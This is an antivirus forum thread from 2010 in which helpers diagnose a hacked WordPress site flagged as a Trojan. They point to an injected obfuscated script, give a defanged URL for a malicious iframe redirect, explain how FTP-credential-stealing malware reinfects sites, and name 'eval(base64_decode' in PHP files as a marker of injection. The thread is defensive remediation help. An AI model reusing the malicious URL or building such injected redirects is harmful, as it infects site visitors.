Avast blocking MY website

system · February 8, 2010, 6:30pm

How can I disable avast on my website, it was working fine on Saturday but now when I try to access it come up with Trojan Horse found, how the hell can this be right? I am not happy at all with Avast at the moment.
hxxp://www.charmouth-dorset.co.uk

system · February 8, 2010, 6:39pm

Hi clothahump, welcome to the forum

Could you please modify your link to make it unclickable (i.e. chage http to hXXp) to prevent others potentially becoming infected.

This kind of detection is very common these days, with many ‘legitimate sites’ becoming hacked to distribute malware:

Every 3.6 seconds a website is infected

Unfortunately, it would appear that your site has been hacked, there is an obfuscated script in the middle of the page, which is causing avast! to alert…

As you can see, avast isn’t alone in this detection: http://www.virustotal.com/analisis/6fa245bab1859aaf37e4be0b753db4a41f465c05236ef1c081d0c333693a67d3-1265654235

A post worth reading by DavidR

DavidR post:2:

Actually cleaning the file is not going to resolve why you got hacked it will only clean the file (well avast doesn’t clean the file just alerts to it, you have to find and strip out the injected code) and not the cause, you need to contact your host, see below.

– HACKED SITES - This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.

We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.
I suggest the following clean up procedure for both your accounts:

check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
“default.cfm” pages as those are popular targets too.

Remove any “rouge” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

Check all .htaccess files, as hackers like to load re-directs into them.

Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
“strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

system · February 8, 2010, 6:45pm

It is wordpress based and the last date the main page was changed is “Last edited by admin on 21/12/2009 at 15:25”

The village of Charmouth lies on the West Dorset coast of England nestling between the Towns of Bridport and Lyme Regis, there is a very relaxed feeling to the village which is ever popular with tourists from around the World.

[caption id="attachment_19" align="aligncenter" width="400" caption="Charmouth from the West"]<img class="size-full wp-image-19" title="charmouth" src="http://www.charmouth-dorset.co.uk/wp-content/uploads/2009/04/charmouth.jpg" alt="Charmouth from the West" width="400" height="221" />[/caption]

Nothing there remotely like a Trojan.

system · February 8, 2010, 6:55pm

It is a few hundred lines above that, line 804 to be precise, as you can see from the image.

Search for “head><script” and you will find it as that is the only occurrence of that particaular code and you will find it.

This can also be used as a reference point to find the script:
http://www.unmaskparasites.com/security-report/?page=www.charmouth-dorset.co.uk

system · February 8, 2010, 7:07pm

Search for df( and you’ll find it pretty quickly. Here’s a screenshot for you: https://dl.dropbox.com/u/3640070/charmouth-dorset.PNG
Incidentally, that obfuscated JS creates a hidden IFRAME that leads to hxxp://itsallbreaksoft.net/tds/in.cgi?3&seoref=undefined&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=undefined&default_keyword=notdefine; I’ll go check that out.

system · February 8, 2010, 7:15pm

Found it an removed, changed passwords on server and Wordpress, the file was edited at 1:12am on the 2nd of February, I was in bed so not me, will be chasing server tech now and start kicking ass.

Thanks Guys.

DavidR · February 8, 2010, 7:52pm

Start by reading the Quoted text Scott posted as this is likely to be an old vulnerable version of WordPress that is being used.

So before you start kicking a**es ensure that it isn’t your own you will be kicking, e.g. who is responsible for the maintenance of wordpress and or any other content management software on your site ;D

system · February 8, 2010, 8:00pm

Wordpress is bang up to date, attack was server side.

DavidR · February 8, 2010, 8:01pm

OK polish your boots so they don’t get stuck ;D

system · February 8, 2010, 9:49pm

Quite often we’re seeing iframes and other malscripts injected as a result of a virus on a PC with FTP access to the infected website.

The virus works by stealing the FTP login credentials from the PC, especially if the PC is using Filezilla which stores all FTP credentials in a plain text file. The virus sends the FTP credentials to a server which then infects whatever websites it has access to.

The virus also works as a keylogger and as a sniffer. FTP transmits all data, including username and password in plain text. Quite easy for the virus to “see” the username, password and FTP address, steal it and send it to “their” server.

So, just cleaning the file and updating the CMS software, etc. won’t necessarily keep the website clean. Changing FTP passwords won’t either because the virus will just steal it again. We’ve seen this over and over again.

You have get rid of Filezilla, if that’s what you’re using (Unmaskparasites has a great article on this issue: http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/ and use FTP software that encrypts the stored usernames and passwords. In this instance, even changing from FTP to SFTP or FTPS won’t help as quite often the hacker’s server is logging in using valid credentials stolen from the plain text file on the PC.

The hackers also like to install backdoors so when you clean and remove the virus that steals FTP passwords, the hackers can still infect the website.

Often times we’ve seen code that contains: eval(base64_decode in .php file. It’s usually found at the top or the very bottom of the .php file. Often times this code is used to remotely inject malscripts into websites. Other times we’re seeing a variety of Perl files used to reinfect websites.

Just thought you’d like to know…

system · February 9, 2010, 8:44am

Thanks for posting the above information, WeWatchYourWebs

Avast blocking MY website

Announcements